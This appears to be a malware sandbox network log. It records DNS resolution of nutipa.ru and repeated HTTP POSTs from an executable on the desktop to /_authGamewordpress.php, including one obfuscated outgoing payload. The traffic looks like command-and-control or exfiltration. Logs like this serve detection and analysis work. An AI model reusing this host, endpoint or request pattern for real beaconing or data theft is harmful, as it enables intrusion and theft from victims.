                                                            Dec 15, 2024 19:37:58.568873882 CET8049838104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:58.569119930 CET4983980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:58.569124937 CET4983880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:58.582103968 CET4983980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:58.702714920 CET8049839104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:58.935688972 CET4983980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:59.056369066 CET8049839104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:59.056411028 CET8049839104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:59.056437969 CET8049839104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:59.659472942 CET8049839104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:59.701085091 CET4983980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:59.892218113 CET8049839104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:59.938071012 CET4983980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:00.010061979 CET4984080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:00.131033897 CET8049840104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:00.131256104 CET4984080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:00.131548882 CET4984080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:00.257186890 CET8049840104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:00.482367992 CET4984080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:00.602824926 CET8049840104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:00.602873087 CET8049840104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:00.602902889 CET8049840104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:01.226608992 CET8049840104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:01.279366016 CET4984080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:01.481857061 CET8049840104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:01.529181004 CET4984080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:01.638381004 CET4984080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:01.638500929 CET4983980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:01.643594980 CET4984180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:01.759555101 CET8049840104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:01.759646893 CET4984080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:01.763685942 CET8049841104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:01.763786077 CET4984180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:01.766807079 CET4984180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:01.886699915 CET8049841104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:02.123197079 CET4984180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:02.250418901 CET8049841104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:02.250468016 CET8049841104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:02.250495911 CET8049841104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:02.852874994 CET8049841104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:03.029221058 CET4984180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:03.090897083 CET8049841104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:03.139730930 CET4984180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:03.140017986 CET4984280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:03.216269970 CET4984380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:03.266094923 CET8049842104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:03.266239882 CET4984280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:03.266438961 CET8049841104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:03.266510963 CET4984180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:03.340205908 CET8049843104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:03.340326071 CET4984380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:03.340619087 CET4984380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:03.460503101 CET8049843104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:03.685527086 CET4984380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:03.805653095 CET8049843104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:03.805675030 CET8049843104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:03.805690050 CET8049843104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:04.429358959 CET8049843104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:04.482321024 CET4984380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:04.698626995 CET8049843104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:04.747935057 CET4984380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:04.911595106 CET4984380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:04.912427902 CET4984480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:05.032422066 CET8049843104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:05.032447100 CET8049844104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:05.032504082 CET4984380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:05.032684088 CET4984480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:05.036149979 CET4984480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:05.157291889 CET8049844104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:05.388701916 CET4984480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:05.516930103 CET8049844104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:05.516978025 CET8049844104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:05.517004967 CET8049844104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:06.123265982 CET8049844104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:06.253442049 CET4984480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:06.374641895 CET8049844104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:06.419953108 CET4984480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:06.494920015 CET4984480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:06.495775938 CET4984580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:06.615310907 CET8049844104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:06.615426064 CET4984480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:06.615550041 CET8049845104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:06.615641117 CET4984580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:06.615848064 CET4984580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:06.735743046 CET8049845104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:06.966782093 CET4984580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:07.088310003 CET8049845104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:07.088359118 CET8049845104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:07.088387012 CET8049845104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:07.703382969 CET8049845104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:07.921118021 CET4984580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:07.965614080 CET8049845104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.089189053 CET4984580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.089975119 CET4984680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.209893942 CET8049845104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.209923029 CET8049846104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.210020065 CET4984680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.210113049 CET4984580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.210261106 CET4984680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.217426062 CET4984680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.218291044 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.330131054 CET8049846104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.338242054 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.338442087 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.338500023 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.344872952 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.380026102 CET8049846104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.458554983 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.464760065 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.464931965 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.465217113 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.586564064 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.690563917 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.810574055 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.810868025 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.810911894 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.931070089 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.931092024 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.931103945 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.102890968 CET8049846104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.103045940 CET4984680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.426402092 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.530088902 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.552788973 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.660123110 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.716737032 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.716773987 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.799356937 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.916552067 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.916565895 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.917062044 CET4984980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:10.037801981 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:10.037838936 CET8049849104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:10.038058996 CET4984980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:10.038096905 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:10.038223028 CET4984980192.168.2.4104.21.64.130
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 15, 2024 19:36:23.324891090 CET | 64317 | 53 | 192.168.2.4 | 1.1.1.1
                                                            Dec 15, 2024 19:36:23.759043932 CET | 53 | 64317 | 1.1.1.1 | 192.168.2.4
                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                            Dec 15, 2024 19:36:23.324891090 CET | 192.168.2.4 | 1.1.1.1 | 0xd72 | Standard query (0) | nutipa.ru | A (IP address) | IN (0x0001) | false
                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                            Dec 15, 2024 19:36:23.759043932 CET | 1.1.1.1 | 192.168.2.4 | 0xd72 | No error (0) | nutipa.ru |  | 104.21.64.130 | A (IP address) | IN (0x0001) | false
                                                            Dec 15, 2024 19:36:23.759043932 CET | 1.1.1.1 | 192.168.2.4 | 0xd72 | No error (0) | nutipa.ru |  | 172.67.185.214 | A (IP address) | IN (0x0001) | false
                                                            • nutipa.ru
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.4 | 49738 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:23.885973930 CET | 319 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:36:24.972141981 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:25.241660118 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CohZsKrq5DtWBqVlHXUTKf3jiOjBYNv6SuXAZ%2BhsX6fZrA5VR6X%2F6V7Sa5u9zzKc%2FfSMWswDOIQX6ZHs1S3sDoCEBDpcFK2tr64msuC4ZNeY5n1jz2Lo%2B1Wbbbs%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f2889ff1e2e4294-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7282&min_rtt=1948&rtt_var=11399&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=663&delivery_rate=32717&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Dec 15, 2024 19:36:25.314455986 CET | 295 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 384
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:25.629704952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:26.105432987 CET | 949 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUElJ5bXNn7DAEn1O6Befx0pWUfHVKWwx4c0kiiMVKNNX8ngXndvFk30VNPvM6jjnQqHC%2BKQN4WZnkc5A2RxJ%2BO5uCBhypf1p1n4cnyRsw0bsWPN1IOuNv%2F12N4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a033cc44294-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=11144&min_rtt=1761&rtt_var=16512&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2156&recv_bytes=1342&delivery_rate=2367567&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Dec 15, 2024 19:36:26.148133039 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:26.465931892 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:26.995726109 CET | 949 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5u1dje8Anz0ARJFx3L1x33ctnfLc0BEvgqXUl2yrPiuwAi5Uv94%2F4vDMy9cYaQJ9LwQeX%2BKJxB8LBrLf9nPIvcTnO36aG1ilI84k8QXXNBmphEqKrcaLDDRnCAU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a087b674294-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=15521&min_rtt=1761&rtt_var=20520&sent=13&recv=13&lost=0&retrans=0&sent_bytes=3130&recv_bytes=3058&delivery_rate=2367567&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Dec 15, 2024 19:36:27.006078005 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:27.320672989 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:27.842607975 CET | 802 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MiwSu24gsIVydCjyspmCvlR35h3Q5HimgIBzxL2puSv%2BvTVqovz19sw3RrXYhd%2BCeOFvH%2F5G0BLo8EW8CPr9OHE8M3wodBfWfLdv86roa3o9OlmNWGHvO3Td2GM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a0dcb014294-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=18896&min_rtt=1758&rtt_var=24287&sent=19&recv=18&lost=0&retrans=0&sent_bytes=4104&recv_bytes=5890&delivery_rate=2367567&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.4 | 49740 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:25.533586979 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:26.626297951 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:26.869967937 CET | 791 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsetH5FFxPJzwBuq9%2BoVtNyRPwdC9ysakghetsnYPwooon67XdaMWN6l5mbIcohQZKae5K0AMtTVK4kOHAHxqaYoMimCwQqhxydEVcVnik8dvajMfDyk5p5j24E%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a09784018c0-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3298&min_rtt=1715&rtt_var=3810&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=101501&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.4 | 49742 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:28.096306086 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:29.184340000 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:29.537604094 CET | 789 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cY441QkOktKkX8Lf76zUTySx2fpoK9cZ7jJ%2F2%2Fm4HDw4o08LbwvqADhCSuCh2HVfZq%2FToHX79biMZClywNdh9009jkTYWch9dX7bJcXsaQPlUozg4CoTZBFfGEU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a197a8a8c9c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4186&min_rtt=2004&rtt_var=5116&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=75010&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a
                                                            Data Ascii: 44W@T
                                                            Dec 15, 2024 19:36:29.729270935 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.4 | 49745 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:30.186753988 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:36:31.278477907 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:31.543986082 CET | 796 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Zz%2FytVKo%2F4UBNcjfmQImaUqCXA0Zeom9Sf%2F3DzYl0h3Tf92fPzPQAg7LxFEBU4sFxQYk395Ah8HrnitY9acBVylawxITYGIgofjBi3hx41Ex4%2Fzd3KXzGMuCbE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a268d5643a4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3889&min_rtt=1776&rtt_var=4893&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=78137&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.4 | 49747 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:31.790682077 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.4 | 49749 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:32.134924889 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:36:32.482455969 CET | 1420 | OUT | Data Raw: 50 50 46 5f 5a 5d 5d 51 5d 5a 56 51 50 5c 57 50 55 55 5e 45 5a 50 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PPF_Z]]Q]ZVQP\WPUU^EZP[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^)-!=#\!:E<='X#,8\19'>")'$=6<#!T/.F'#P 7
                                                            Dec 15, 2024 19:36:33.222235918 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:33.534456015 CET | 941 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
